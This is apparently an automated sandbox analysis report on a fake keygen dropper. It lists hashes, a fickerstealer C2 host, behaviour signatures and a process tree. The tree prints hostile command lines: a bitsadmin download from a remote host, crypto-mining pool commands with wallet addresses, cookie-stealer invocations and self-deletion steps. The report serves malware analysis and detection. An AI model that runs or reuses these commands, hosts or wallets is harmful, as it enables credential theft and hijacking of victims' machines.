Resubmissions

24-04-2021 06:39

210424-z9rcb7aepa 10

23-04-2021 19:10

210423-eqazybfbwe 10

23-04-2021 19:10

210423-11yc7me6fe 10

23-04-2021 18:20

210423-96m9f6fxjx 10

23-04-2021 13:38

210423-fv1qhsltzj 10

23-04-2021 13:38

210423-6hhapn6pdx 10

23-04-2021 13:38

210423-m5azl6mq1s 10

23-04-2021 13:38

210423-nlvbxenam6 10

23-04-2021 13:38

210423-y4rkc8l6ts 10

23-04-2021 05:23

210423-lejp16ex1n 10

Analysis

  • max time kernel
    1801s
  • max time network
    1421s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    24-04-2021 06:39

General

  • Target

    keygen-step-4.exe

  • Size

    4.6MB

  • MD5

    563107b1df2a00f4ec868acd9e08a205

  • SHA1

    9cb9c91d66292f5317aa50d92e38834861e9c9b7

  • SHA256

    bf2bd257dde4921ce83c7c1303fafe7f9f81e53c2775d3c373ced482b22eb8a9

  • SHA512

    99a8d247fa435c4cd95be7bc64c7dd6e382371f3a3c160aac3995fd705e4fd3f6622c23784a4ae3457c87536347d15eda3f08aa616450778a99376df540d74d1

Malware Config

Extracted

Family

fickerstealer

C2

sodaandcoke.top:80

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Windows security bypass 2 TTPs
  • fickerstealer

    Ficker is an infostealer written in Rust and ASM.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • XMRig Miner Payload 3 IoCs
  • Blocklisted process makes network request 16 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 49 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 14 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 24 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 60 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 9 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:2416
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s WpnService
    1⤵
      PID:2760
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2752
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Browser
      1⤵
        PID:2596
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
        1⤵
          PID:2484
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
          1⤵
            PID:1896
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s SENS
            1⤵
              PID:1448
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s UserManager
              1⤵
                PID:1316
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s Themes
                1⤵
                  PID:1268
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                  1⤵
                    PID:1120
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    PID:1032
                    • C:\Users\Admin\AppData\Roaming\hccrwsf
                      C:\Users\Admin\AppData\Roaming\hccrwsf
                      2⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:5988
                    • C:\Users\Admin\AppData\Roaming\sgcrwsf
                      C:\Users\Admin\AppData\Roaming\sgcrwsf
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:2308
                      • C:\Users\Admin\AppData\Roaming\sgcrwsf
                        C:\Users\Admin\AppData\Roaming\sgcrwsf
                        3⤵
                        • Executes dropped EXE
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:5648
                    • C:\Users\Admin\AppData\Roaming\hccrwsf
                      C:\Users\Admin\AppData\Roaming\hccrwsf
                      2⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:4572
                    • C:\Users\Admin\AppData\Roaming\sgcrwsf
                      C:\Users\Admin\AppData\Roaming\sgcrwsf
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:5052
                      • C:\Users\Admin\AppData\Roaming\sgcrwsf
                        C:\Users\Admin\AppData\Roaming\sgcrwsf
                        3⤵
                        • Executes dropped EXE
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:3576
                    • C:\Windows\system32\rundll32.exe
                      C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\EaIFXnVstsO\EaIFXnVstsO.dll",EaIFXnVstsO
                      2⤵
                      • Windows security modification
                      • Drops file in System32 directory
                      • Modifies data under HKEY_USERS
                      PID:5268
                    • C:\Users\Admin\AppData\Roaming\hccrwsf
                      C:\Users\Admin\AppData\Roaming\hccrwsf
                      2⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:2204
                    • C:\Users\Admin\AppData\Roaming\sgcrwsf
                      C:\Users\Admin\AppData\Roaming\sgcrwsf
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:5232
                      • C:\Users\Admin\AppData\Roaming\sgcrwsf
                        C:\Users\Admin\AppData\Roaming\sgcrwsf
                        3⤵
                        • Executes dropped EXE
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:2500
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                    1⤵
                      PID:68
                    • C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe
                      "C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe"
                      1⤵
                      • Checks computer location settings
                      • Suspicious use of WriteProcessMemory
                      PID:4024
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of SetWindowsHookEx
                        • Suspicious use of WriteProcessMemory
                        PID:2888
                        • C:\Windows\SysWOW64\rundll32.exe
                          "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                          3⤵
                          • Loads dropped DLL
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:3680
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3628
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of WriteProcessMemory
                        PID:3860
                        • C:\Users\Admin\AppData\Local\Temp\is-IK92S.tmp\Install.tmp
                          "C:\Users\Admin\AppData\Local\Temp\is-IK92S.tmp\Install.tmp" /SL5="$40142,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                          3⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of WriteProcessMemory
                          PID:684
                          • C:\Users\Admin\AppData\Local\Temp\is-RVTL9.tmp\Ultra.exe
                            "C:\Users\Admin\AppData\Local\Temp\is-RVTL9.tmp\Ultra.exe" /S /UID=burnerch1
                            4⤵
                            • Drops file in Drivers directory
                            • Executes dropped EXE
                            • Adds Run key to start application
                            • Drops file in Program Files directory
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:3596
                            • C:\Program Files\Windows NT\QXYWDLUOFA\ultramediaburner.exe
                              "C:\Program Files\Windows NT\QXYWDLUOFA\ultramediaburner.exe" /VERYSILENT
                              5⤵
                              • Executes dropped EXE
                              • Suspicious use of WriteProcessMemory
                              PID:4156
                              • C:\Users\Admin\AppData\Local\Temp\is-HJ5C7.tmp\ultramediaburner.tmp
                                "C:\Users\Admin\AppData\Local\Temp\is-HJ5C7.tmp\ultramediaburner.tmp" /SL5="$401DC,281924,62464,C:\Program Files\Windows NT\QXYWDLUOFA\ultramediaburner.exe" /VERYSILENT
                                6⤵
                                • Executes dropped EXE
                                • Drops file in Program Files directory
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of FindShellTrayWindow
                                • Suspicious use of WriteProcessMemory
                                PID:4188
                                • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                  "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                  7⤵
                                  • Executes dropped EXE
                                  PID:4272
                            • C:\Users\Admin\AppData\Local\Temp\05-2c25c-730-8d3bf-5bcd330008e50\Qikanenasae.exe
                              "C:\Users\Admin\AppData\Local\Temp\05-2c25c-730-8d3bf-5bcd330008e50\Qikanenasae.exe"
                              5⤵
                              • Executes dropped EXE
                              • Checks computer location settings
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4232
                            • C:\Users\Admin\AppData\Local\Temp\08-80410-c24-1afb9-4f3dadec17d76\Xunaehimowae.exe
                              "C:\Users\Admin\AppData\Local\Temp\08-80410-c24-1afb9-4f3dadec17d76\Xunaehimowae.exe"
                              5⤵
                              • Executes dropped EXE
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of WriteProcessMemory
                              PID:4316
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hvwqauuu.0jh\instEU.exe & exit
                                6⤵
                                • Suspicious use of WriteProcessMemory
                                PID:5016
                                • C:\Users\Admin\AppData\Local\Temp\hvwqauuu.0jh\instEU.exe
                                  C:\Users\Admin\AppData\Local\Temp\hvwqauuu.0jh\instEU.exe
                                  7⤵
                                    PID:5112
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\o22bxsx1.moj\md1_1eaf.exe & exit
                                  6⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:4212
                                  • C:\Users\Admin\AppData\Local\Temp\o22bxsx1.moj\md1_1eaf.exe
                                    C:\Users\Admin\AppData\Local\Temp\o22bxsx1.moj\md1_1eaf.exe
                                    7⤵
                                    • Executes dropped EXE
                                    • Checks whether UAC is enabled
                                    PID:4984
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ocdchuql.c2v\google-game.exe & exit
                                  6⤵
                                  • Blocklisted process makes network request
                                  • Suspicious use of WriteProcessMemory
                                  PID:4412
                                  • C:\Users\Admin\AppData\Local\Temp\ocdchuql.c2v\google-game.exe
                                    C:\Users\Admin\AppData\Local\Temp\ocdchuql.c2v\google-game.exe
                                    7⤵
                                    • Executes dropped EXE
                                    • Suspicious use of SetWindowsHookEx
                                    PID:1008
                                    • C:\Windows\SysWOW64\rundll32.exe
                                      "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                      8⤵
                                      • Loads dropped DLL
                                      PID:5328
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xkytikjc.d1d\y1.exe & exit
                                  6⤵
                                    PID:5236
                                    • C:\Users\Admin\AppData\Local\Temp\xkytikjc.d1d\y1.exe
                                      C:\Users\Admin\AppData\Local\Temp\xkytikjc.d1d\y1.exe
                                      7⤵
                                      • Executes dropped EXE
                                      PID:6048
                                      • C:\Users\Admin\AppData\Local\Temp\1RdiI043Xv.exe
                                        "C:\Users\Admin\AppData\Local\Temp\1RdiI043Xv.exe"
                                        8⤵
                                        • Executes dropped EXE
                                        • Modifies system certificate store
                                        PID:1904
                                        • C:\Users\Admin\AppData\Roaming\1619253883249.exe
                                          "C:\Users\Admin\AppData\Roaming\1619253883249.exe" /sjson "C:\Users\Admin\AppData\Roaming\1619253883249.txt"
                                          9⤵
                                          • Executes dropped EXE
                                          PID:5460
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\1RdiI043Xv.exe"
                                          9⤵
                                          • Executes dropped EXE
                                          PID:4560
                                          • C:\Windows\SysWOW64\PING.EXE
                                            ping 127.0.0.1 -n 3
                                            10⤵
                                            • Runs ping.exe
                                            PID:4260
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\xkytikjc.d1d\y1.exe"
                                        8⤵
                                          PID:4788
                                          • C:\Windows\SysWOW64\timeout.exe
                                            timeout /T 10 /NOBREAK
                                            9⤵
                                            • Delays execution with timeout.exe
                                            PID:3836
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vobl02mg.luq\inst.exe & exit
                                      6⤵
                                        PID:5488
                                        • C:\Users\Admin\AppData\Local\Temp\vobl02mg.luq\inst.exe
                                          C:\Users\Admin\AppData\Local\Temp\vobl02mg.luq\inst.exe
                                          7⤵
                                            PID:4560
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sgwuegve.ork\SunLabsPlayer.exe /S & exit
                                          6⤵
                                            PID:6132
                                            • C:\Users\Admin\AppData\Local\Temp\sgwuegve.ork\SunLabsPlayer.exe
                                              C:\Users\Admin\AppData\Local\Temp\sgwuegve.ork\SunLabsPlayer.exe /S
                                              7⤵
                                              • Executes dropped EXE
                                              • Loads dropped DLL
                                              • Drops file in Program Files directory
                                              PID:6088
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgBBC6.tmp\tempfile.ps1"
                                                8⤵
                                                • Blocklisted process makes network request
                                                • Executes dropped EXE
                                                PID:5112
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgBBC6.tmp\tempfile.ps1"
                                                8⤵
                                                  PID:5376
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgBBC6.tmp\tempfile.ps1"
                                                  8⤵
                                                    PID:1776
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgBBC6.tmp\tempfile.ps1"
                                                    8⤵
                                                      PID:4240
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgBBC6.tmp\tempfile.ps1"
                                                      8⤵
                                                      • Blocklisted process makes network request
                                                      • Adds Run key to start application
                                                      • Suspicious use of SetThreadContext
                                                      PID:5112
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgBBC6.tmp\tempfile.ps1"
                                                      8⤵
                                                        PID:4828
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgBBC6.tmp\tempfile.ps1"
                                                        8⤵
                                                        • Checks for any installed AV software in registry
                                                        PID:5988
                                                      • C:\Windows\SysWOW64\bitsadmin.exe
                                                        "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                        8⤵
                                                        • Download via BitsAdmin
                                                        PID:5880
                                                      • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                        "C:\Program Files (x86)\lighteningplayer\data_load.exe" -p8Sn1wY9H1gi4Vlf -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                        8⤵
                                                        • Executes dropped EXE
                                                        • Drops file in Program Files directory
                                                        PID:3776
                                                      • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                        "C:\Program Files (x86)\lighteningplayer\data_load.exe" -p3EDfsj3RM1m33yP -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                        8⤵
                                                        • Executes dropped EXE
                                                        PID:812
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgBBC6.tmp\tempfile.ps1"
                                                        8⤵
                                                          PID:5556
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgBBC6.tmp\tempfile.ps1"
                                                          8⤵
                                                            PID:2328
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgBBC6.tmp\tempfile.ps1"
                                                            8⤵
                                                              PID:5284
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgBBC6.tmp\tempfile.ps1"
                                                              8⤵
                                                                PID:5628
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgBBC6.tmp\tempfile.ps1"
                                                                8⤵
                                                                  PID:5904
                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                  C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\EaIFXnVstsO\EaIFXnVstsO.dll" EaIFXnVstsO
                                                                  8⤵
                                                                  • Loads dropped DLL
                                                                  PID:6140
                                                                  • C:\Windows\system32\rundll32.exe
                                                                    C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\EaIFXnVstsO\EaIFXnVstsO.dll" EaIFXnVstsO
                                                                    9⤵
                                                                    • Loads dropped DLL
                                                                    • Drops file in System32 directory
                                                                    • Drops file in Program Files directory
                                                                    PID:2876
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgBBC6.tmp\tempfile.ps1"
                                                                  8⤵
                                                                    PID:2796
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgBBC6.tmp\tempfile.ps1"
                                                                    8⤵
                                                                    • Drops file in Program Files directory
                                                                    PID:4872
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgBBC6.tmp\tempfile.ps1"
                                                                    8⤵
                                                                    • Drops file in Program Files directory
                                                                    PID:4812
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgBBC6.tmp\tempfile.ps1"
                                                                    8⤵
                                                                      PID:4828
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgBBC6.tmp\tempfile.ps1"
                                                                      8⤵
                                                                        PID:4592
                                                                      • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                        "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                        8⤵
                                                                        • Executes dropped EXE
                                                                        • Loads dropped DLL
                                                                        PID:2024
                                                                  • C:\Windows\System32\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xnphqz2v.itq\GcleanerWW.exe /mixone & exit
                                                                    6⤵
                                                                      PID:5176
                                                                    • C:\Windows\System32\cmd.exe
                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5rolp3u2.xqm\toolspab1.exe & exit
                                                                      6⤵
                                                                        PID:5480
                                                                        • C:\Users\Admin\AppData\Local\Temp\5rolp3u2.xqm\toolspab1.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\5rolp3u2.xqm\toolspab1.exe
                                                                          7⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious use of SetThreadContext
                                                                          PID:5720
                                                                          • C:\Users\Admin\AppData\Local\Temp\5rolp3u2.xqm\toolspab1.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\5rolp3u2.xqm\toolspab1.exe
                                                                            8⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            • Checks SCSI registry key(s)
                                                                            • Suspicious behavior: MapViewOfSection
                                                                            PID:4924
                                                                      • C:\Windows\System32\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\n3n5f3hf.w5d\c7ae36fa.exe & exit
                                                                        6⤵
                                                                          PID:4560
                                                                          • C:\Users\Admin\AppData\Local\Temp\n3n5f3hf.w5d\c7ae36fa.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\n3n5f3hf.w5d\c7ae36fa.exe
                                                                            7⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            • Checks SCSI registry key(s)
                                                                            • Suspicious behavior: MapViewOfSection
                                                                            PID:5244
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1g2k5jhf.zrd\app.exe /8-2222 & exit
                                                                          6⤵
                                                                            PID:5712
                                                                            • C:\Users\Admin\AppData\Local\Temp\1g2k5jhf.zrd\app.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\1g2k5jhf.zrd\app.exe /8-2222
                                                                              7⤵
                                                                              • Executes dropped EXE
                                                                              PID:5804
                                                                              • C:\Users\Admin\AppData\Local\Temp\1g2k5jhf.zrd\app.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\1g2k5jhf.zrd\app.exe" /8-2222
                                                                                8⤵
                                                                                • Executes dropped EXE
                                                                                • Modifies data under HKEY_USERS
                                                                                PID:4288
                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                    2⤵
                                                                    • Executes dropped EXE
                                                                    • Modifies system certificate store
                                                                    PID:4412
                                                                    • C:\Users\Admin\AppData\Roaming\80AF.tmp.exe
                                                                      "C:\Users\Admin\AppData\Roaming\80AF.tmp.exe"
                                                                      3⤵
                                                                      • Executes dropped EXE
                                                                      • Suspicious use of SetThreadContext
                                                                      PID:2308
                                                                      • C:\Users\Admin\AppData\Roaming\80AF.tmp.exe
                                                                        "C:\Users\Admin\AppData\Roaming\80AF.tmp.exe"
                                                                        4⤵
                                                                        • Executes dropped EXE
                                                                        • Checks processor information in registry
                                                                        PID:1348
                                                                    • C:\Users\Admin\AppData\Roaming\82F2.tmp.exe
                                                                      "C:\Users\Admin\AppData\Roaming\82F2.tmp.exe"
                                                                      3⤵
                                                                        PID:5112
                                                                        • C:\Windows\system32\msiexec.exe
                                                                          -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w29589@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                          4⤵
                                                                            PID:3620
                                                                          • C:\Windows\system32\msiexec.exe
                                                                            -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w29228 --cpu-max-threads-hint 50 -r 9999
                                                                            4⤵
                                                                            • Blocklisted process makes network request
                                                                            PID:4600
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                          3⤵
                                                                            PID:4140
                                                                            • C:\Windows\SysWOW64\PING.EXE
                                                                              ping 127.0.0.1
                                                                              4⤵
                                                                              • Runs ping.exe
                                                                              PID:1884
                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe"
                                                                          2⤵
                                                                          • Executes dropped EXE
                                                                          • Checks whether UAC is enabled
                                                                          PID:5516
                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe"
                                                                          2⤵
                                                                          • Executes dropped EXE
                                                                          • Adds Run key to start application
                                                                          PID:1352
                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                            3⤵
                                                                            • Executes dropped EXE
                                                                            PID:5368
                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                            3⤵
                                                                            • Executes dropped EXE
                                                                            PID:544
                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                            3⤵
                                                                            • Executes dropped EXE
                                                                            PID:5784
                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                            3⤵
                                                                            • Executes dropped EXE
                                                                            PID:4256
                                                                      • \??\c:\windows\system32\svchost.exe
                                                                        c:\windows\system32\svchost.exe -k netsvcs -s BITS
